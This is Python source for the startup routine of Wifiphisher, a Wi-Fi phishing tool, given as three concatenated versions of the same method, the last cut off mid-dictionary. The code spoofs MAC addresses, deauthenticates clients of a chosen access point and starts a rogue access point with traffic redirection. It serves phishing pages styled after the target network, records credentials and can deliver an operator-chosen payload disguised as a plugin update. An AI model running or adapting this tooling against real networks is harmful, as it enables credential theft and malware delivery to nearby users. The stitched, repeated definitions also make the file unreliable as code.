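def start(self):
    """Run the whole startup sequence, then block in the curses main loop.

    Everything here is a side effect; nothing is returned.  In order:
      1. banner + date greetings, root check (``sys.exit`` when not root),
         channel range, argument parsing, logging setup, optional path /
         dnsmasq / credential-log overrides taken from ``args``;
      2. operation-mode setup and ``self.network_manager.start()``;
      3. interface selection, MAC changes, unblocking and monitor mode,
         all inside one ``try`` whose interface errors end in ``self.stop()``;
      4. firewall / routing setup, target AP selection (or ``--essid``),
         template and optional payload selection, template context;
      5. rogue AP start, extension manager, background web server thread,
         and finally the interactive TUI until it returns or Ctrl-C.

    ``self.stop()`` is called on every failure path and is assumed to
    terminate the process -- if it ever returned, later code would read
    names (``essid``, ``ap_iface``, ...) that may be unbound.
    TODO(review): confirm stop() never returns.
    """
    today = time.strftime("%Y-%m-%d %H:%M")
    print('[' + T + '*' + W + '] Starting Wifiphisher %s ( %s ) at %s' %
          (VERSION, WEBSITE, today))
    # Show some emotions.
    if BIRTHDAY in today:
        print '[' + T + '*' + W + \
            '] Wifiphisher was first released on this day in 2015! ' \
            'Happy birthday!'
    if NEW_YEAR in today:
        print '[' + T + '*' + W + \
            '] Happy new year!'
    # First of - are you root?  Interface and iptables work below needs it.
    if os.geteuid():
        logger.error("Non root user detected")
        sys.exit('[' + R + '-' + W + '] Please run as root')
    # Set the channel range
    set_channel_range()
    # Parse args (module globals: later code and the TUI read them)
    global args, APs
    args = parse_args()
    # setup the logging configuration
    setup_logging(args)
    if args.phishing_pages_directory:
        # check if the path ends with the proper separator, if not add it
        # this is to prevent problems when joining path with string concatenation
        if args.phishing_pages_directory[-1] != os.path.sep:
            args.phishing_pages_directory += os.path.sep
        phishing_pages_dir = args.phishing_pages_directory
        logger.info("Searching for scenario in %s" % phishing_pages_dir)
    if args.dnsmasq_conf:
        self.access_point.dns_conf_path = args.dnsmasq_conf
    if args.credential_log_path:
        # Operator-chosen location for whatever the web server records.
        phishinghttp.credential_log_path = args.credential_log_path
    # Initialize the operation mode manager
    self.opmode.initialize(args)
    # Set operation mode
    self.opmode.set_opmode(args, self.network_manager)
    self.network_manager.start()
    # TODO: We should have more checks here:
    # Is anything binded to our HTTP(S) ports?
    # Maybe we should save current iptables rules somewhere
    # get interfaces for monitor mode and AP mode and set the monitor interface
    # to monitor mode. shutdown on any errors
    try:
        if self.opmode.internet_sharing_enabled():
            self.network_manager.internet_access_enable = True
            if self.network_manager.is_interface_valid(
                    args.internetinterface, "internet"):
                internet_interface = args.internetinterface
                if interfaces.is_wireless_interface(internet_interface):
                    self.network_manager.unblock_interface(
                        internet_interface)
            logger.info("Selecting %s interface for accessing internet",
                        args.internetinterface)
        # check if the interface for WPS is valid
        if self.opmode.assoc_enabled():
            if self.network_manager.is_interface_valid(
                    args.wpspbc_assoc_interface, "WPS"):
                logger.info("Selecting %s interface for WPS association",
                            args.wpspbc_assoc_interface)
        if self.opmode.extensions_enabled():
            if args.extensionsinterface and args.apinterface:
                if self.network_manager.is_interface_valid(
                        args.extensionsinterface, "monitor"):
                    mon_iface = args.extensionsinterface
                    self.network_manager.unblock_interface(mon_iface)
                if self.network_manager.is_interface_valid(
                        args.apinterface, "AP"):
                    ap_iface = args.apinterface
            else:
                mon_iface, ap_iface = \
                    self.network_manager.get_interface_automatically()
            # display selected interfaces to the user
            logger.info(
                "Selecting {} for deauthentication and {} for the rogue Access Point"
                .format(mon_iface, ap_iface))
            print(
                "[{0}+{1}] Selecting {0}{2}{1} interface for the deauthentication "
                "attack\n[{0}+{1}] Selecting {0}{3}{1} interface for creating the "
                "rogue Access Point").format(G, W, mon_iface, ap_iface)
        if not self.opmode.extensions_enabled():
            if args.apinterface:
                if self.network_manager.is_interface_valid(
                        args.apinterface, "AP"):
                    ap_iface = args.apinterface
            else:
                ap_iface = self.network_manager.get_interface(True, False)
            # Without extensions a single interface plays both roles.
            mon_iface = ap_iface
            print(
                "[{0}+{1}] Selecting {0}{2}{1} interface for creating the "
                "rogue Access Point").format(G, W, ap_iface)
            logger.info(
                "Selecting {} interface for rogue Access Point".format(
                    ap_iface))
        # Randomize MAC.  An invalid user-supplied MAC is reported but does
        # not abort startup; the interface keeps whatever address it had.
        if not args.no_mac_randomization:
            try:
                new_mac = self.network_manager.set_interface_mac(
                    ap_iface, args.mac_ap_interface)
                logger.info("Changing {} MAC address to {}".format(
                    ap_iface, new_mac))
                print "[{0}+{1}] Changing {2} MAC addr (BSSID) to {3}".format(
                    G, W, ap_iface, new_mac)
                if mon_iface != ap_iface:
                    new_mac = self.network_manager.set_interface_mac(
                        mon_iface, args.mac_extensions_interface)
                    logger.info("Changing {} MAC address to {}".format(
                        mon_iface, new_mac))
                    # Report the interface that was actually changed.
                    print "[{0}+{1}] Changing {2} MAC addr (BSSID) to {3}".format(
                        G, W, mon_iface, new_mac)
            except interfaces.InvalidMacAddressError as err:
                print("[{0}!{1}] {2}").format(R, W, err)
        # make sure interfaces are not blocked
        logger.info("Unblocking interfaces")
        self.network_manager.unblock_interface(ap_iface)
        self.network_manager.unblock_interface(mon_iface)
        # set monitor mode only when --essid is not given
        if self.opmode.extensions_enabled() or args.essid is None:
            self.network_manager.set_interface_mode(mon_iface, "monitor")
    except (interfaces.InvalidInterfaceError,
            interfaces.InterfaceCantBeFoundError,
            interfaces.InterfaceManagedByNetworkManagerError) as err:
        logger.exception("The following error has occurred:")
        print("[{0}!{1}] {2}").format(R, W, err)
        time.sleep(1)
        self.stop()
    if not args.internetinterface and not args.keepnetworkmanager:
        kill_interfering_procs()
        logger.info("Killing all interfering processes")
    if self.opmode.internet_sharing_enabled():
        self.fw.nat(ap_iface, args.internetinterface)
        set_ip_fwd()
    else:
        self.fw.redirect_requests_localhost()
        set_route_localnet()
    print '[' + T + '*' + W + '] Cleared leases, started DHCP, set up iptables'
    time.sleep(1)
    if args.essid:
        essid = args.essid
        channel = str(CHANNEL)
        # We don't have target attacking MAC in frenzy mode
        # That is we deauth all the BSSIDs that being sniffed
        target_ap_mac = None
        enctype = None
    else:
        # let user choose access point
        # start the monitor adapter
        self.network_manager.up_interface(mon_iface)
        ap_info_object = tui.ApSelInfo(mon_iface, self.mac_matcher,
                                       self.network_manager, args)
        ap_sel_object = tui.TuiApSel()
        access_point = curses.wrapper(ap_sel_object.gather_info,
                                      ap_info_object)
        # if the user has chosen a access point continue
        # otherwise shutdown
        if access_point:
            # store choosen access point's information
            essid = access_point.name
            channel = access_point.channel
            target_ap_mac = access_point.mac_address
            enctype = access_point.encryption
        else:
            self.stop()
    # create a template manager object
    self.template_manager = phishingpage.TemplateManager(
        data_pages=args.phishing_pages_directory)
    # get the correct template
    tui_template_obj = tui.TuiTemplateSelection()
    template = tui_template_obj.gather_info(args.phishingscenario,
                                            self.template_manager)
    logger.info("Selecting {} template".format(
        template.get_display_name()))
    print("[" + G + "+" + W + "] Selecting " +
          template.get_display_name() + " template")
    # payload selection for browser plugin update
    if template.has_payload():
        payload_path = args.payload_path
        # Prompt until an existing file is named, then copy it into the
        # template directory so the web server can serve it.
        while not payload_path or not os.path.isfile(payload_path):
            # get payload path
            payload_path = raw_input(
                "[" + G + "+" + W + "] Enter the [" + G + "full path" + W +
                "] to the payload you wish to serve: ")
            if not os.path.isfile(payload_path):
                print '[' + R + '-' + W + '] Invalid file path!'
        print '[' + T + '*' + W + '] Using ' + G + payload_path + W + ' as payload '
        template.update_payload_path(os.path.basename(payload_path))
        copyfile(
            payload_path,
            self.template_manager.template_directory +
            template.get_payload_path())
    # APs is a module global filled in elsewhere; each value is indexed
    # as (channel, essid, bssid) here.
    APs_context = []
    for i in APs:
        APs_context.append({
            'channel': APs[i][0] or "",
            'essid': APs[i][1] or "",
            'bssid': APs[i][2] or "",
            'vendor': self.mac_matcher.get_vendor_name(APs[i][2]) or ""
        })
    template.merge_context({'APs': APs_context})
    # only get logo path if MAC address is present
    ap_logo_path = False
    if target_ap_mac is not None:
        ap_logo_path = template.use_file(
            self.mac_matcher.get_vendor_logo_path(target_ap_mac))
    template.merge_context({
        'target_ap_channel': channel or "",
        'target_ap_essid': args.phishing_essid or essid or "",
        'target_ap_bssid': target_ap_mac or "",
        'target_ap_encryption': enctype or "",
        'target_ap_vendor': self.mac_matcher.get_vendor_name(target_ap_mac) or "",
        'target_ap_logo_path': ap_logo_path or ""
    })
    # add wps_enable into the template context
    if args.wps_pbc:
        template.merge_context({'wps_pbc_attack': "1"})
    else:
        template.merge_context({'wps_pbc_attack': "0"})
    # We want to set this now for hostapd. Maybe the interface was in "monitor"
    # mode for network discovery before (e.g. when --noextensions is enabled).
    self.network_manager.set_interface_mode(ap_iface, "managed")
    # Start AP
    self.network_manager.up_interface(ap_iface)
    self.access_point.interface = ap_iface
    self.access_point.channel = channel
    self.access_point.essid = essid
    if args.force_hostapd:
        print('[' + T + '*' + W + '] Using hostapd instead of roguehostapd.'
              " Many significant features will be turned off.")
        self.access_point.force_hostapd = True
    if args.wpspbc_assoc_interface:
        wps_mac = self.network_manager.get_interface_mac(
            args.wpspbc_assoc_interface)
        self.access_point.deny_mac_addrs.append(wps_mac)
    if args.presharedkey:
        self.access_point.presharedkey = args.presharedkey
    if self.opmode.internet_sharing_enabled():
        self.access_point.internet_interface = args.internetinterface
    print '[' + T + '*' + W + '] Starting the fake access point...'
    try:
        self.access_point.start(disable_karma=args.disable_karma)
        self.access_point.start_dhcp_dns()
    except BaseException:
        # Also catches SystemExit/KeyboardInterrupt; nothing is logged here,
        # so the failure reason is only visible if stop() reports it.
        self.stop()
    # Start Extension Manager (EM)
    # We need to start EM before we boot the web server
    if self.opmode.extensions_enabled():
        shared_data = {
            'is_freq_hop_allowed': self.opmode.freq_hopping_enabled(),
            'target_ap_channel': channel or "",
            'target_ap_essid': essid or "",
            'target_ap_bssid': target_ap_mac or "",
            'target_ap_encryption': enctype or "",
            'target_ap_logo_path': ap_logo_path or "",
            'rogue_ap_essid': essid or "",
            'rogue_ap_mac': self.network_manager.get_interface_mac(ap_iface),
            'roguehostapd': self.access_point.hostapd_object,
            'APs': APs_context,
            'args': args
        }
        self.network_manager.up_interface(mon_iface)
        self.em.set_interface(mon_iface)
        # Work on a copy so the module-level default list is never mutated.
        extensions = list(DEFAULT_EXTENSIONS)
        if args.lure10_exploit:
            extensions.append(LURE10_EXTENSION)
        if args.handshake_capture:
            extensions.append(HANDSHAKE_VALIDATE_EXTENSION)
        if args.nodeauth:
            extensions.remove(DEAUTH_EXTENSION)
        if args.wps_pbc:
            extensions.append(WPSPBC)
        if args.known_beacons:
            extensions.append(KNOWN_BEACONS_EXTENSION)
        if not args.force_hostapd:
            extensions.append(ROGUEHOSTAPDINFO)
        self.em.set_extensions(extensions)
        self.em.init_extensions(shared_data)
        self.em.start_extensions()
    # With configured DHCP, we may now start the web server
    if not self.opmode.internet_sharing_enabled():
        # Start HTTP server in a background (daemon) thread so it dies
        # with the main thread.
        print '[' + T + '*' + W + '] Starting HTTP/HTTPS server at ports ' + str(
            PORT) + ", " + str(SSL_PORT)
        webserver = Thread(target=phishinghttp.runHTTPServer,
                           args=(NETWORK_GW_IP, PORT, SSL_PORT, template,
                                 self.em))
        webserver.daemon = True
        webserver.start()
        time.sleep(1.5)
    # We no longer need mac_matcher
    self.mac_matcher.unbind()
    APs = []
    # Main loop.
    try:
        main_info = tui.MainInfo(VERSION, essid, channel, ap_iface, self.em,
                                 phishinghttp, args)
        tui_main_object = tui.TuiMain()
        curses.wrapper(tui_main_object.gather_info, main_info)
        self.stop()
    except KeyboardInterrupt:
        self.stop()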
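def start(self):
    """Run the startup sequence and then draw the status screen until Ctrl-C.

    Everything here is a side effect; nothing is returned.  In order:
      1. argument parsing / checking and the root check (``sys.exit`` when
         not root), then ``self.network_manager.start()``;
      2. interface selection and MAC changes inside one ``try`` whose
         interface errors end in ``self.stop()``;
      3. firewall / routing setup, target AP selection (or ``--essid``),
         template and optional payload selection, template context;
      4. rogue AP start, background web server thread, extension manager;
      5. a blessings ``Terminal`` loop that redraws the status until
         ``KeyboardInterrupt`` (also raised on ``--quitonsuccess``).

    ``self.stop()`` is assumed to terminate the process; if it ever
    returned, later code would read names that may be unbound.
    TODO(review): confirm stop() never returns.
    """
    # Parse args (module globals: read by later code)
    global args, APs
    args = parse_args()
    # Check args
    check_args(args)
    # Are you root?  Interface and iptables work below needs it.
    if os.geteuid():
        sys.exit('[' + R + '-' + W + '] Please run as root')
    self.network_manager.start()
    # TODO: We should have more checks here:
    # Is anything binded to our HTTP(S) ports?
    # Maybe we should save current iptables rules somewhere
    # get interfaces for monitor mode and AP mode and set the monitor interface
    # to monitor mode. shutdown on any errors
    try:
        if args.internetinterface:
            if self.network_manager.is_interface_valid(
                    args.internetinterface, "internet"):
                internet_interface = args.internetinterface
                self.network_manager.unblock_interface(internet_interface)
        if not args.nojamming:
            if args.jamminginterface and args.apinterface:
                if self.network_manager.is_interface_valid(
                        args.jamminginterface, "monitor"):
                    mon_iface = args.jamminginterface
                    self.network_manager.unblock_interface(mon_iface)
                if self.network_manager.is_interface_valid(
                        args.apinterface, "AP"):
                    ap_iface = args.apinterface
            else:
                mon_iface, ap_iface = \
                    self.network_manager.get_interface_automatically()
            # display selected interfaces to the user
            print(
                "[{0}+{1}] Selecting {0}{2}{1} interface for the deauthentication "
                "attack\n[{0}+{1}] Selecting {0}{3}{1} interface for creating the "
                "rogue Access Point").format(G, W, mon_iface, ap_iface)
            # randomize the mac addresses (a user-supplied MAC wins over random)
            if not args.no_mac_randomization:
                if args.mac_ap_interface:
                    self.network_manager.set_interface_mac(
                        ap_iface, args.mac_ap_interface)
                else:
                    self.network_manager.set_interface_mac_random(ap_iface)
                if args.mac_deauth_interface:
                    self.network_manager.set_interface_mac(
                        mon_iface, args.mac_deauth_interface)
                else:
                    self.network_manager.set_interface_mac_random(
                        mon_iface)
        else:
            if args.apinterface:
                if self.network_manager.is_interface_valid(
                        args.apinterface, "AP"):
                    ap_iface = args.apinterface
            else:
                ap_iface = self.network_manager.get_interface(True, False)
            # Without jamming a single interface plays both roles.
            mon_iface = ap_iface
            # Set the MAC exactly once here; a second unconditional
            # randomization would silently discard --mac-ap-interface.
            if not args.no_mac_randomization:
                if args.mac_ap_interface:
                    self.network_manager.set_interface_mac(
                        ap_iface, args.mac_ap_interface)
                else:
                    self.network_manager.set_interface_mac_random(ap_iface)
            print(
                "[{0}+{1}] Selecting {0}{2}{1} interface for creating the "
                "rogue Access Point").format(G, W, ap_iface)
        # make sure interfaces are not blocked
        self.network_manager.unblock_interface(ap_iface)
        self.network_manager.unblock_interface(mon_iface)
        if not args.internetinterface:
            kill_interfering_procs()
        self.network_manager.set_interface_mode(mon_iface, "monitor")
    except (interfaces.InvalidInterfaceError,
            interfaces.InterfaceCantBeFoundError,
            interfaces.InterfaceManagedByNetworkManagerError) as err:
        print("[{0}!{1}] {2}").format(R, W, err)
        time.sleep(1)
        self.stop()
    # The rogue AP's own address, kept separate from the target AP's
    # address (ap_mac) chosen further down.
    rogue_ap_mac = self.network_manager.get_interface_mac(ap_iface)
    if not args.no_mac_randomization:
        print "[{0}+{1}] {2} mac address becomes is now {3} ".format(
            G, W, ap_iface, rogue_ap_mac)
        if not args.nojamming:
            mon_mac = self.network_manager.get_interface_mac(mon_iface)
            print("[{0}+{1}] {2} mac address becomes {3}".format(
                G, W, mon_iface, mon_mac))
    if args.internetinterface:
        self.fw.nat(ap_iface, args.internetinterface)
        set_ip_fwd()
    else:
        self.fw.redirect_requests_localhost()
        set_route_localnet()
    print '[' + T + '*' + W + '] Cleared leases, started DHCP, set up iptables'
    time.sleep(1)
    if args.essid:
        essid = args.essid
        channel = str(CHANNEL)
        ap_mac = None
        enctype = None
    else:
        # let user choose access point
        access_point = curses.wrapper(select_access_point, mon_iface,
                                      self.mac_matcher, self.network_manager)
        # if the user has chosen a access point continue
        # otherwise shutdown
        if access_point:
            # store choosen access point's information
            essid = access_point.get_name()
            channel = access_point.get_channel()
            ap_mac = access_point.get_mac_address()
            enctype = access_point.get_encryption()
        else:
            self.stop()
    # create a template manager object
    self.template_manager = phishingpage.TemplateManager()
    # get the correct template
    template = select_template(args.phishingscenario, self.template_manager)
    print("[" + G + "+" + W + "] Selecting " +
          template.get_display_name() + " template")
    # payload selection for browser plugin update
    if template.has_payload():
        payload_path = False
        # Prompt until an existing file is named, then copy it into the
        # phishing pages directory so the web server can serve it.
        while not payload_path or not os.path.isfile(payload_path):
            # get payload path
            payload_path = raw_input(
                "[" + G + "+" + W + "] Enter the [" + G + "full path" + W +
                "] to the payload you wish to serve: ")
            if not os.path.isfile(payload_path):
                print '[' + R + '-' + W + '] Invalid file path!'
        print '[' + T + '*' + W + '] Using ' + G + payload_path + W + ' as payload '
        copyfile(payload_path, PHISHING_PAGES_DIR + template.get_payload_path())
    # APs is a module global filled in elsewhere; each value is indexed
    # as (channel, essid, bssid) here.
    APs_context = []
    for i in APs:
        APs_context.append({
            'channel': APs[i][0] or "",
            'essid': APs[i][1] or "",
            'bssid': APs[i][2] or "",
            'vendor': self.mac_matcher.get_vendor_name(APs[i][2]) or ""
        })
    template.merge_context({'APs': APs_context})
    # only get logo path if MAC address is present
    ap_logo_path = False
    if ap_mac:
        ap_logo_path = template.use_file(
            self.mac_matcher.get_vendor_logo_path(ap_mac))
    template.merge_context({
        'target_ap_channel': channel or "",
        'target_ap_essid': essid or "",
        'target_ap_bssid': ap_mac or "",
        'target_ap_encryption': enctype or "",
        'target_ap_vendor': self.mac_matcher.get_vendor_name(ap_mac) or "",
        'target_ap_logo_path': ap_logo_path or ""
    })
    # We want to set this now for hostapd. Maybe the interface was in "monitor"
    # mode for network discovery before (e.g. when --nojamming is enabled).
    self.network_manager.set_interface_mode(ap_iface, "managed")
    # Start AP
    self.access_point.set_interface(ap_iface)
    self.access_point.set_channel(channel)
    self.access_point.set_essid(essid)
    if args.presharedkey:
        self.access_point.set_psk(args.presharedkey)
    if args.internetinterface:
        self.access_point.set_internet_interface(args.internetinterface)
    print '[' + T + '*' + W + '] Starting the fake access point...'
    try:
        self.access_point.start()
        self.access_point.start_dhcp_dns()
    except BaseException:
        # Also catches SystemExit/KeyboardInterrupt; nothing is logged here,
        # so the failure reason is only visible if stop() reports it.
        self.stop()
    # With configured DHCP, we may now start the web server
    if not args.internetinterface:
        # Start HTTP server in a background (daemon) thread so it dies
        # with the main thread.
        print '[' + T + '*' + W + '] Starting HTTP/HTTPS server at ports ' + str(
            PORT) + ", " + str(SSL_PORT)
        webserver = Thread(target=phishinghttp.runHTTPServer,
                           args=(NETWORK_GW_IP, PORT, SSL_PORT, template))
        webserver.daemon = True
        webserver.start()
        time.sleep(1.5)
    # We no longer need mac_matcher
    self.mac_matcher.unbind()
    APs = []
    if not args.nojamming:
        # Start Extension Manager
        shared_data = {
            'target_ap_channel': channel or "",
            'target_ap_essid': essid or "",
            'target_ap_bssid': ap_mac or "",
            'target_ap_encryption': enctype or "",
            'target_ap_logo_path': ap_logo_path or "",
            'rogue_ap_mac': rogue_ap_mac,
            'APs': APs_context,
            'args': args
        }
        self.em.set_interface(mon_iface)
        # Work on a copy so the module-level default list is never mutated.
        extensions = list(DEFAULT_EXTENSIONS)
        if args.lure10_exploit:
            extensions.append(LURE10_EXTENSION)
        self.em.set_extensions(extensions)
        self.em.init_extensions(shared_data)
        self.em.start_extensions()
    # Main loop: redraw the status screen until interrupted.
    try:
        term = Terminal()
        with term.fullscreen():
            while True:
                term.clear()
                with term.hidden_cursor():
                    print term.move(0, term.width - 30) + "|"
                    print term.move(
                        1, term.width - 30) + "|" + " " + term.bold_blue(
                            "Wifiphisher " + VERSION)
                    print term.move(
                        2, term.width - 30) + "|" + " ESSID: " + essid
                    print term.move(
                        3, term.width - 30) + "|" + " Channel: " + channel
                    print term.move(
                        4, term.width - 30) + "|" + " AP interface: " + ap_iface
                    print term.move(5, term.width - 30) + "|" + "_" * 29
                    print term.move(
                        1, 0) + term.blue("Deauthenticating clients: ")
                    if not args.nojamming:
                        # show the 5 most recent entries
                        for line in self.em.get_output()[-5:]:
                            print line
                    print term.move(7, 0) + term.blue("DHCP Leases: ")
                    # Both tails read fixed, well-known paths; no user input
                    # reaches the argument list.
                    if os.path.isfile('/var/lib/misc/dnsmasq.leases'):
                        proc = check_output(
                            ['tail', '-5', '/var/lib/misc/dnsmasq.leases'])
                        print term.move(8, 0) + proc
                    print term.move(14, 0) + term.blue("HTTP requests: ")
                    if os.path.isfile('/tmp/wifiphisher-webserver.tmp'):
                        proc = check_output([
                            'tail', '-5', '/tmp/wifiphisher-webserver.tmp'
                        ])
                        print term.move(15, 0) + proc
                    if phishinghttp.terminate and args.quitonsuccess:
                        raise KeyboardInterrupt
    except KeyboardInterrupt:
        self.stop()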
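def start(self):
    """Run the whole startup sequence, then block in the curses main loop.

    Everything here is a side effect; nothing is returned.  In order:
      1. argument parsing, logging setup, operation-mode setup and the root
         check (``sys.exit`` when not root), then
         ``self.network_manager.start()``;
      2. interface selection, MAC changes, unblocking and monitor mode,
         all inside one ``try`` whose interface errors end in ``self.stop()``;
      3. firewall / routing setup, target AP selection (or ``--essid``),
         template and optional payload selection, template context;
      4. rogue AP start, extension manager, background web server thread,
         and finally the interactive TUI until it returns or Ctrl-C.

    ``self.stop()`` is called on every failure path and is assumed to
    terminate the process -- if it ever returned, later code would read
    names (``essid``, ``ap_iface``, ...) that may be unbound.
    TODO(review): confirm stop() never returns.
    """
    # Parse args (module globals: later code and the TUI read them)
    global args, APs
    args = parse_args()
    # setup the logging configuration
    setup_logging(args)
    # Initialize the operation mode manager
    self.opmode.initialize(args)
    # Set operation mode
    self.opmode.set_opmode(args, self.network_manager)
    # Are you root?  Interface and iptables work below needs it.
    if os.geteuid():
        logger.error("Non root user detected")
        sys.exit('[' + R + '-' + W + '] Please run as root')
    self.network_manager.start()
    # TODO: We should have more checks here:
    # Is anything binded to our HTTP(S) ports?
    # Maybe we should save current iptables rules somewhere
    # get interfaces for monitor mode and AP mode and set the monitor interface
    # to monitor mode. shutdown on any errors
    try:
        if self.opmode.internet_sharing_enabled():
            self.network_manager.internet_access_enable = True
            if self.network_manager.is_interface_valid(
                    args.internetinterface, "internet"):
                internet_interface = args.internetinterface
                if interfaces.is_wireless_interface(internet_interface):
                    self.network_manager.unblock_interface(
                        internet_interface)
            logger.info("Selecting %s interface for accessing internet",
                        args.internetinterface)
        # check if the interface for WPS is valid
        if self.opmode.assoc_enabled():
            if self.network_manager.is_interface_valid(
                    args.wpspbc_assoc_interface, "WPS"):
                logger.info("Selecting %s interface for WPS association",
                            args.wpspbc_assoc_interface)
        if self.opmode.extensions_enabled():
            if args.extensionsinterface and args.apinterface:
                if self.network_manager.is_interface_valid(
                        args.extensionsinterface, "monitor"):
                    mon_iface = args.extensionsinterface
                    self.network_manager.unblock_interface(mon_iface)
                if self.network_manager.is_interface_valid(
                        args.apinterface, "AP"):
                    ap_iface = args.apinterface
            else:
                mon_iface, ap_iface = \
                    self.network_manager.get_interface_automatically()
            # display selected interfaces to the user
            logger.info(
                "Selecting {} for deauthentication and {} for the rogue Access Point"
                .format(mon_iface, ap_iface))
            print(
                "[{0}+{1}] Selecting {0}{2}{1} interface for the deauthentication "
                "attack\n[{0}+{1}] Selecting {0}{3}{1} interface for creating the "
                "rogue Access Point").format(G, W, mon_iface, ap_iface)
            # randomize the mac addresses (a user-supplied MAC wins over random)
            if not args.no_mac_randomization:
                if args.mac_ap_interface:
                    self.network_manager.set_interface_mac(
                        ap_iface, args.mac_ap_interface)
                else:
                    self.network_manager.set_interface_mac_random(ap_iface)
                # The option tested and the option applied must be the same
                # one (--mac-extensions-interface).
                if args.mac_extensions_interface:
                    self.network_manager.set_interface_mac(
                        mon_iface, args.mac_extensions_interface)
                else:
                    self.network_manager.set_interface_mac_random(
                        mon_iface)
        if not self.opmode.extensions_enabled():
            if args.apinterface:
                if self.network_manager.is_interface_valid(
                        args.apinterface, "AP"):
                    ap_iface = args.apinterface
            else:
                ap_iface = self.network_manager.get_interface(True, False)
            # Without extensions a single interface plays both roles.
            mon_iface = ap_iface
            # Set the MAC exactly once here; a second unconditional
            # randomization would silently discard --mac-ap-interface.
            if not args.no_mac_randomization:
                if args.mac_ap_interface:
                    self.network_manager.set_interface_mac(
                        ap_iface, args.mac_ap_interface)
                else:
                    self.network_manager.set_interface_mac_random(ap_iface)
            print(
                "[{0}+{1}] Selecting {0}{2}{1} interface for creating the "
                "rogue Access Point").format(G, W, ap_iface)
            logger.info(
                "Selecting {} interface for rouge access point".format(
                    ap_iface))
        # make sure interfaces are not blocked
        logger.info("Unblocking interfaces")
        self.network_manager.unblock_interface(ap_iface)
        self.network_manager.unblock_interface(mon_iface)
        # set monitor mode only when --essid is not given
        if self.opmode.extensions_enabled() or args.essid is None:
            self.network_manager.set_interface_mode(mon_iface, "monitor")
    except (interfaces.InvalidInterfaceError,
            interfaces.InterfaceCantBeFoundError,
            interfaces.InterfaceManagedByNetworkManagerError) as err:
        logger.exception("The following error has occurred:")
        print("[{0}!{1}] {2}").format(R, W, err)
        time.sleep(1)
        self.stop()
    if not args.internetinterface:
        kill_interfering_procs()
        logger.info("Killing all interfering processes")
    # The rogue AP's own address, kept separate from the target AP's
    # address (target_ap_mac) chosen further down.
    rogue_ap_mac = self.network_manager.get_interface_mac(ap_iface)
    if not args.no_mac_randomization:
        logger.info("Changing {} MAC address to {}".format(
            ap_iface, rogue_ap_mac))
        print "[{0}+{1}] Changing {2} MAC addr (BSSID) to {3}".format(
            G, W, ap_iface, rogue_ap_mac)
        if self.opmode.extensions_enabled():
            mon_mac = self.network_manager.get_interface_mac(mon_iface)
            logger.info("Changing {} MAC address to {}".format(
                mon_iface, mon_mac))
            print("[{0}+{1}] Changing {2} MAC addr to {3}".format(
                G, W, mon_iface, mon_mac))
    if self.opmode.internet_sharing_enabled():
        self.fw.nat(ap_iface, args.internetinterface)
        set_ip_fwd()
    else:
        self.fw.redirect_requests_localhost()
        set_route_localnet()
    print '[' + T + '*' + W + '] Cleared leases, started DHCP, set up iptables'
    time.sleep(1)
    if args.essid:
        essid = args.essid
        channel = str(CHANNEL)
        # We don't have target attacking MAC in frenzy mode
        # That is we deauth all the BSSIDs that being sniffed
        target_ap_mac = None
        enctype = None
    else:
        # let user choose access point
        # start the monitor adapter
        self.network_manager.up_interface(mon_iface)
        ap_info_object = tui.ApSelInfo(mon_iface, self.mac_matcher,
                                       self.network_manager, args)
        ap_sel_object = tui.TuiApSel()
        access_point = curses.wrapper(ap_sel_object.gather_info,
                                      ap_info_object)
        # if the user has chosen a access point continue
        # otherwise shutdown
        if access_point:
            # store choosen access point's information
            essid = access_point.get_name()
            channel = access_point.get_channel()
            target_ap_mac = access_point.get_mac_address()
            enctype = access_point.get_encryption()
        else:
            self.stop()
    # create a template manager object
    self.template_manager = phishingpage.TemplateManager()
    # get the correct template
    tui_template_obj = tui.TuiTemplateSelection()
    template = tui_template_obj.gather_info(args.phishingscenario,
                                            self.template_manager)
    logger.info("Selecting {} template".format(
        template.get_display_name()))
    print("[" + G + "+" + W + "] Selecting " +
          template.get_display_name() + " template")
    # payload selection for browser plugin update
    if template.has_payload():
        payload_path = args.payload_path
        # Prompt until an existing file is named, then copy it into the
        # phishing pages directory so the web server can serve it.
        while not payload_path or not os.path.isfile(payload_path):
            # get payload path
            payload_path = raw_input(
                "[" + G + "+" + W + "] Enter the [" + G + "full path" + W +
                "] to the payload you wish to serve: ")
            if not os.path.isfile(payload_path):
                print '[' + R + '-' + W + '] Invalid file path!'
        print '[' + T + '*' + W + '] Using ' + G + payload_path + W + ' as payload '
        template.update_payload_path(os.path.basename(payload_path))
        copyfile(payload_path, PHISHING_PAGES_DIR + template.get_payload_path())
    # APs is a module global filled in elsewhere; each value is indexed
    # as (channel, essid, bssid) here.
    APs_context = []
    for i in APs:
        APs_context.append({
            'channel': APs[i][0] or "",
            'essid': APs[i][1] or "",
            'bssid': APs[i][2] or "",
            'vendor': self.mac_matcher.get_vendor_name(APs[i][2]) or ""
        })
    template.merge_context({'APs': APs_context})
    # only get logo path if MAC address is present
    ap_logo_path = False
    if target_ap_mac is not None:
        ap_logo_path = template.use_file(
            self.mac_matcher.get_vendor_logo_path(target_ap_mac))
    template.merge_context({
        'target_ap_channel': channel or "",
        'target_ap_essid': essid or "",
        'target_ap_bssid': target_ap_mac or "",
        'target_ap_encryption': enctype or "",
        'target_ap_vendor': self.mac_matcher.get_vendor_name(target_ap_mac) or "",
        'target_ap_logo_path': ap_logo_path or ""
    })
    # We want to set this now for hostapd. Maybe the interface was in "monitor"
    # mode for network discovery before (e.g. when --noextensions is enabled).
    self.network_manager.set_interface_mode(ap_iface, "managed")
    # Start AP
    self.network_manager.up_interface(ap_iface)
    self.access_point.set_interface(ap_iface)
    self.access_point.set_channel(channel)
    self.access_point.set_essid(essid)
    if args.wpspbc_assoc_interface:
        wps_mac = self.network_manager.get_interface_mac(
            args.wpspbc_assoc_interface)
        self.access_point.add_deny_macs([wps_mac])
    if args.presharedkey:
        self.access_point.set_psk(args.presharedkey)
    if self.opmode.internet_sharing_enabled():
        self.access_point.set_internet_interface(args.internetinterface)
    print '[' + T + '*' + W + '] Starting the fake access point...'
    try:
        self.access_point.start()
        self.access_point.start_dhcp_dns()
    except BaseException:
        # Also catches SystemExit/KeyboardInterrupt; nothing is logged here,
        # so the failure reason is only visible if stop() reports it.
        self.stop()
    # Start Extension Manager (EM)
    # We need to start EM before we boot the web server
    if self.opmode.extensions_enabled():
        shared_data = {
            'is_freq_hop_allowed': self.opmode.freq_hopping_enabled(),
            'target_ap_channel': channel or "",
            'target_ap_essid': essid or "",
            'target_ap_bssid': target_ap_mac or "",
            'target_ap_encryption': enctype or "",
            'target_ap_logo_path': ap_logo_path or "",
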